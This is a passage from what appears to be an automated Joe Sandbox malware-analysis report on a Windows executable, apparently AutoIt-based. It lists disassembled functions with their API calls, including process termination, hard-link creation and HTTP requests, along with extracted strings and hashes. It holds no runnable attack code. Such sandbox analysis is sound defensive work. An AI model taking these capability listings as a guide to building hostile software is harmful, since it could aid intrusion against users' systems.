                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00957FB1
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00957FC4
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00957FD7
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00957FEA
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00957FFD
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00958010
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00958023
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00958036
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00958049
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0095805C
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0095806F
                                      • __mtinitlocks.LIBCMT ref: 00957B4C
                                        • Part of subcall function 00957E23: InitializeCriticalSectionAndSpinCount.KERNEL32(009EAC68,00000FA0,?,?,00957B51,00955E77,009E6C70,00000014), ref: 00957E41
                                      • __mtterm.LIBCMT ref: 00957B55
                                        • Part of subcall function 00957BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00957D3F
                                        • Part of subcall function 00957BBD: _free.LIBCMT ref: 00957D46
                                        • Part of subcall function 00957BBD: RtlDeleteCriticalSection.NTDLL(009EAC68), ref: 00957D68
                                      • __calloc_crt.LIBCMT ref: 00957B7A
                                      • GetCurrentThreadId.KERNEL32 ref: 00957BA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                      • String ID:
                                      • API String ID: 2942034483-0
                                      • Opcode ID: 084163a0d54881ab45682b45866d47a533d2758e2b6d3e138cfea9582c358f8e
                                      • Instruction ID: 22362ed2bafdbfc2815cbd6c35a114f8fdd7554982fad7dc23ee92d009c52cfe
                                      • Opcode Fuzzy Hash: 084163a0d54881ab45682b45866d47a533d2758e2b6d3e138cfea9582c358f8e
                                      • Instruction Fuzzy Hash: 35F0963211D3621AE624F7F77C4774AA6889F41737B2006A9FC64D50E1FF249A494361
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0093281D
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00932825
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00932830
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0093283B
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00932843
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0093284B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: 0bd7141e932ec85cec576bea736d73ff1927da07f38c2e048c4eaef5a7a88575
                                      • Instruction ID: b65899c61ca431a8e9ab9d014f8d5a49366e37b1d5827b255de6f8d473f7f85f
                                      • Opcode Fuzzy Hash: 0bd7141e932ec85cec576bea736d73ff1927da07f38c2e048c4eaef5a7a88575
                                      • Instruction Fuzzy Hash: 510167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00421BA15C47A42C7F5A864CBE5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 1423608774-0
                                      • Opcode ID: f1bee1b1144f4b88f7a1e2d633eac355313e65eb09c3df43ba91da6432a00190
                                      • Instruction ID: 9c2ef5e822620b67bf2c4a0b7da320952ce9c6eccecd7c2751b58b9dbd02f217
                                      • Opcode Fuzzy Hash: f1bee1b1144f4b88f7a1e2d633eac355313e65eb09c3df43ba91da6432a00190
                                      • Instruction Fuzzy Hash: 1E01A437217212ABDB196B64EE49EEB7779FFC8711B044639F507921A0EB749800EB50
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00977C07
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00977C1D
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00977C2C
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00977C3B
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00977C45
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00977C4C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: 2adb3a99df70eba1c5bfb2d82cf10e621fbdaef9cf24adcb17300c6e1c02c293
                                      • Instruction ID: a99d0b37106d5c119cc8f966971743fc4654fe2fa7ba8adb1f69b68a9ea676a9
                                      • Opcode Fuzzy Hash: 2adb3a99df70eba1c5bfb2d82cf10e621fbdaef9cf24adcb17300c6e1c02c293
                                      • Instruction Fuzzy Hash: B6F0B472116158BFE72517529D0DEEF7F7CDFC6B25F000118FA01D1051E7A01A41E6B5
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 00979A33
                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00979A44
                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,009A5DEE,?,?,?,?,?,0093ED63), ref: 00979A51
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,009A5DEE,?,?,?,?,?,0093ED63), ref: 00979A5E
                                        • Part of subcall function 009793D1: CloseHandle.KERNEL32(?,?,00979A6B,?,?,?,009A5DEE,?,?,?,?,?,0093ED63), ref: 009793DB
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00979A71
                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 00979A78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: d6e77be561feb63db3a0527db8d4dfa0f678a514d78580c5a58bd47f7b870879
                                      • Instruction ID: b9fe4dbe66c8d7c0a19d4d015b78889187d2e523b9204ce1c9662ca9f3bc285f
                                      • Opcode Fuzzy Hash: d6e77be561feb63db3a0527db8d4dfa0f678a514d78580c5a58bd47f7b870879
                                      • Instruction Fuzzy Hash: 83F0E23715B201ABD7152BA4EE8DEEB3739FF84321B040225F203910A0EB749800EB50
                                      APIs
                                        • Part of subcall function 0094F4EA: std::exception::exception.LIBCMT ref: 0094F51E
                                        • Part of subcall function 0094F4EA: __CxxThrowException@8.LIBCMT ref: 0094F533
                                      • __swprintf.LIBCMT ref: 00931EA6
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00931D49
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw__swprintfstd::exception::exception
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 2125237772-557222456
                                      • Opcode ID: 2f483ce410b717342495ced68171c80fa5aee4b426bf24a0a351fa9cb4021cd9
                                      • Instruction ID: 9b46f5511a521a0d72f669911d5b5fb83a8daa7bbe7225c2ef6d57504adca24f
                                      • Opcode Fuzzy Hash: 2f483ce410b717342495ced68171c80fa5aee4b426bf24a0a351fa9cb4021cd9
                                      • Instruction Fuzzy Hash: 68912DB15082019FC724EF24C895E6EB7E8AFD5700F04491DF9969B2A1DB71ED44CF92
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0098B006
                                      • CharUpperBuffW.USER32(?,?), ref: 0098B115
                                      • VariantClear.OLEAUT32(?), ref: 0098B298
                                        • Part of subcall function 00979DC5: VariantInit.OLEAUT32(00000000), ref: 00979E05
                                        • Part of subcall function 00979DC5: VariantCopy.OLEAUT32(?,?), ref: 00979E0E
                                        • Part of subcall function 00979DC5: VariantClear.OLEAUT32(?), ref: 00979E1A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      • Opcode ID: a1f5b359df2a32ad188a11d5601f11fff6d31cfac21c884f5b8132dad02fea39
                                      • Instruction ID: 1e0d32be5cf4300c19a03acaa463f5bcabdff28c07bc595e624cd062dc309417
                                      • Opcode Fuzzy Hash: a1f5b359df2a32ad188a11d5601f11fff6d31cfac21c884f5b8132dad02fea39
                                      • Instruction Fuzzy Hash: A4915D716083019FCB10EF24C495A5AB7F4EFC9704F08496DF89A9B3A1DB31E945CB52
                                      APIs
                                        • Part of subcall function 0094C6F4: _wcscpy.LIBCMT ref: 0094C717
                                      • _memset.LIBCMT ref: 00975438
                                      • GetMenuItemInfoW.USER32(?), ref: 00975467
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00975513
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0097553D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                      • String ID: 0
                                      • API String ID: 4152858687-4108050209
                                      • Opcode ID: 670b8906467b235db96f995eb460ca32bef8cef209c7852ce907d57bf08c16a2
                                      • Instruction ID: d5da73beb4c79222ebbae7595611e707742f94e1e33e5c49401cafa9edbe4445
                                      • Opcode Fuzzy Hash: 670b8906467b235db96f995eb460ca32bef8cef209c7852ce907d57bf08c16a2
                                      • Instruction Fuzzy Hash: E05104735187019BD794DB28C84577BB7E9AB85350F058A29F89DD31E0DBE0CD448B92
                                      APIs
                                      • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0097027B
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009702B1
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009702C2
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00970344
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: 822df2e5a15cf8d1af7104cd54a993d4e6e04c19f03b3fd718733492cbbfe643
                                      • Instruction ID: eb367b126e4a341816390ebc5b3a06b9162063fc1ab9189ead1037241544542b
                                      • Opcode Fuzzy Hash: 822df2e5a15cf8d1af7104cd54a993d4e6e04c19f03b3fd718733492cbbfe643
                                      • Instruction Fuzzy Hash: 97416D72605204EFDB05CF64C885BAA7BB9EF84314B14C0A9E90D9F206E7B5D944CBA0
                                      APIs
                                      • _memset.LIBCMT ref: 00975075
                                      • GetMenuItemInfoW.USER32 ref: 00975091
                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009750D7
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009F1708,00000000), ref: 00975120
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem_memset
                                      • String ID: 0
                                      • API String ID: 1173514356-4108050209
                                      • Opcode ID: 856a2f928124812a45198a43df6fd392e4b314b31bc0340013fed9706dcd990c
                                      • Instruction ID: a0869f57136fbca62880604825a0f27f84aee224f1cbc7be6671ee7530e7b205
                                      • Opcode Fuzzy Hash: 856a2f928124812a45198a43df6fd392e4b314b31bc0340013fed9706dcd990c
                                      • Instruction Fuzzy Hash: 1D41D4322097019FD720DF24D885B6AB7E8AF85325F058A1EF95D97291D7B0EC00CB62
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0097E742
                                      • GetLastError.KERNEL32(?,00000000), ref: 0097E768
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0097E78D
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0097E7B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID: p1#v`K$v
                                      • API String ID: 3321077145-1068180069
                                      • Opcode ID: a2c415e5aa95790b38f8f44a7d769f0ab559d012b38bd64c0628a74ff08b0e54
                                      • Instruction ID: 0513f3ccb9aaf7e943434c36f47f9aa1160dc711ae8f41c12283281b2eb9c77f
                                      • Opcode Fuzzy Hash: a2c415e5aa95790b38f8f44a7d769f0ab559d012b38bd64c0628a74ff08b0e54
                                      • Instruction Fuzzy Hash: C641123A600610DFCB15EF15C585A4DBBE5BF99720F198498E94AAB3A2CB74FD00CB91
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00990587
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharLower
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 2358735015-567219261
                                      • Opcode ID: 33708f3d3eccf719cec1091aeee3142964756e0dc831d77cf052434ae7332d65
                                      • Instruction ID: 837b30e69ae89e32157b1da93f7439bcc4e29e8b48660e5daa0dff402afd6a03
                                      • Opcode Fuzzy Hash: 33708f3d3eccf719cec1091aeee3142964756e0dc831d77cf052434ae7332d65
                                      • Instruction Fuzzy Hash: CB31A170600616AFCF10EF58C981AEEB3B8FF95314B108A29E876A72D1DB71A915CF50
                                      APIs
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0096B88E
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0096B8A1
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 0096B8D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 34a8a652fe625c34bce116159e15681407e4e21bf0d8d9bc82a361f5481847a1
                                      • Instruction ID: 69e8573c59bf6cf6b4d6250027f2f23a79898de78409abf87dd21b20e1c95c4f
                                      • Opcode Fuzzy Hash: 34a8a652fe625c34bce116159e15681407e4e21bf0d8d9bc82a361f5481847a1
                                      • Instruction Fuzzy Hash: 372105B1A00108BFDB14AB64C886EFE777CDF85354F104129F422E31E0EB744D469B60
                                      APIs
                                      • _memset.LIBCMT ref: 0093522F
                                      • _wcscpy.LIBCMT ref: 00935283
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00935293
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009A3CB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                      • String ID: Line:
                                      • API String ID: 1053898822-1585850449
                                      • Opcode ID: e0c63d78ee491dfaa3b5be1e5227dec30dca9e9d792e58bef65c8d9e34735721
                                      • Instruction ID: fac355ce903b6794e4cd4937a189a846440961b3e97d195661f887f873373813
                                      • Opcode Fuzzy Hash: e0c63d78ee491dfaa3b5be1e5227dec30dca9e9d792e58bef65c8d9e34735721
                                      • Instruction Fuzzy Hash: 3331AD7150C740AFD321EBA0DC46FEF77E8AB88314F00891AF59992091EB70A648CFD6
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00984401
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00984427
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00984457
                                      • InternetCloseHandle.WININET(00000000), ref: 0098449E
                                        • Part of subcall function 00985052: GetLastError.KERNEL32(?,?,009843CC,00000000,00000000,00000001), ref: 00985067
                                      Strings
                                      Memory Dump Source
